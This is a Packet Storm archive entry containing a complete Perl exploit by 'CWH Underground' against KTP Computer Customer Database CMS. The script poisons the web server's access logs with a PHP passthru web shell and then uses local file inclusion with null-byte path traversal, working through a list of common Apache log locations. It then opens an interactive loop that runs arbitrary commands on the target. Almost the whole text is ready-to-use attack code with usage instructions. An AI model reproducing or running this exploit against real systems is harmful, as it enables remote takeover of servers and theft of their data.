ktpccd-lfi.txt

2008-11-30T00:00:00
ID PACKETSTORM:72453
Type packetstorm
Reporter CWH Underground
Modified 2008-11-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
#======================================  
# KTPCCD Local File Inclusion Exploit  
#======================================  
#  
# ,--^----------,--------,-----,-------^--,  
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
# `+---------------------------^----------|  
# `\_,-------, _________________________|  
# / XXXXXX /`| /  
# / XXXXXX / `\ /  
# / XXXXXX /\______(  
# / XXXXXX /   
# / XXXXXX /  
# (________(   
# `------'  
#  
#AUTHOR : CWH Underground  
#DATE : 30 November 2008  
#SITE : cwh.citec.us  
#  
#  
#####################################################  
#APPLICATION : KTP Computer Customer Database CMS  
#VERSION : 1  
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip  
######################################################  
#Note: magic_quotes_gpc = off  
#Vulnerability in Local File Inclusion  
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution  
#######################################################################################  
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
  
use LWP::UserAgent;  
use IO::Socket;  
use LWP::Simple;  
  
$log="../";  
@apache=(  
"../../../../../var/log/httpd/access_log",  
"../../../../../var/log/httpd/error_log",  
"../apache/logs/error.log",  
"../apache/logs/access.log",  
"../../apache/logs/error.log",  
"../../apache/logs/access.log",  
"../../../apache/logs/error.log",  
"../../../apache/logs/access.log",  
"../../../../apache/logs/error.log",  
"../../../../apache/logs/access.log",  
"../../../../../apache/logs/error.log",  
"../../../../../apache/logs/access.log",  
"../logs/error.log",  
"../logs/access.log",  
"../../logs/error.log",  
"../../logs/access.log",  
"../../../logs/error.log",  
"../../../logs/access.log",  
"../../../../logs/error.log",  
"../../../../logs/access.log",  
"../../../../../logs/error.log",  
"../../../../../logs/access.log",  
"../../../../../etc/httpd/logs/access_log",  
"../../../../../etc/httpd/logs/access.log",  
"../../../../../etc/httpd/logs/error_log",  
"../../../../../etc/httpd/logs/error.log",  
"../../.. /../../var/www/logs/access_log",  
"../../../../../var/www/logs/access.log",  
"../../../../../usr/local/apache/logs/access_log",  
"../../../../../usr/local/apache/logs/access.log",  
"../../../../../var/log/apache/access_log",  
"../../../../../var/log/apache/access.log",  
"../../../../../var/log/access_log",  
"../../../../../var/www/logs/error_log",  
"../../../../../var/www/logs/error.log",  
"../../../../../usr/local/apache/logs/error_log",  
"../../../../../usr/local/apache/logs/error.log",  
"../../../../../var/log/apache/error_log",  
"../../../../../var/log/apache/error.log",  
"../../../../../var/log/access_log",  
"../../../../../var/log/error_log"  
);  
  
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }  
  
print "\n==============================================\n";  
print " KTP Computer Customer Database \n";  
print " Remote Command Execution Exploit \n";  
print " Discovered By CWH Underground \n";  
print "==============================================\n";  
print " \n";  
print " ,--^----------,--------,-----,-------^--, \n";  
print " | ||||||||| `--------' | O \n";  
print " `+---------------------------^----------| \n";  
print " `\_,-------, _________________________| \n";  
print " / XXXXXX /`| / \n";  
print " / XXXXXX / `\ / \n";  
print " / XXXXXX /\______( \n";  
print " / XXXXXX / \n";  
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";  
print " (________( \n";  
print " `------' \n";  
print " \n";  
  
  
  
if (@ARGV < 2)  
{  
print "Usage: ./xpl.pl <Host> <Path>\n";  
print "Ex. ./xpl.pl www.hackme.com /ktp\n";  
  
}  
  
$host=$ARGV[0];  
$path=$ARGV[1];  
  
  
if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}  
  
print "\nTrying to Inject the Code...\n";  
  
$CODE="<? passthru(\$_GET[cmd]) ?>";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";  
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
close($socket);  
  
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}  
  
foreach $getlog(@apache)  
{  
chomp($getlog);  
$find= $host.$path."/?p=".$getlog."%00";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $find);  
$res = $xpl->request($req);  
$info = $res->content;  
if($info =~ /cwhunderground/)  
{print "\nSuccessfully injected in $getlog \n";$log=$getlog;}  
}  
  
  
my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }  
  
chomp( $cmd = <STDIN> );  
  
while($cmd !~ "exit") {   
  
$shell= $host.$path."/?p=".$log."%00&cmd=$cmd";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $shell);  
$res = $xpl->request($req);  
$info = $res->content;  
print "\n$info";  
  
  
my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }  
chomp( $cmd = <STDIN> );   
}  
  
`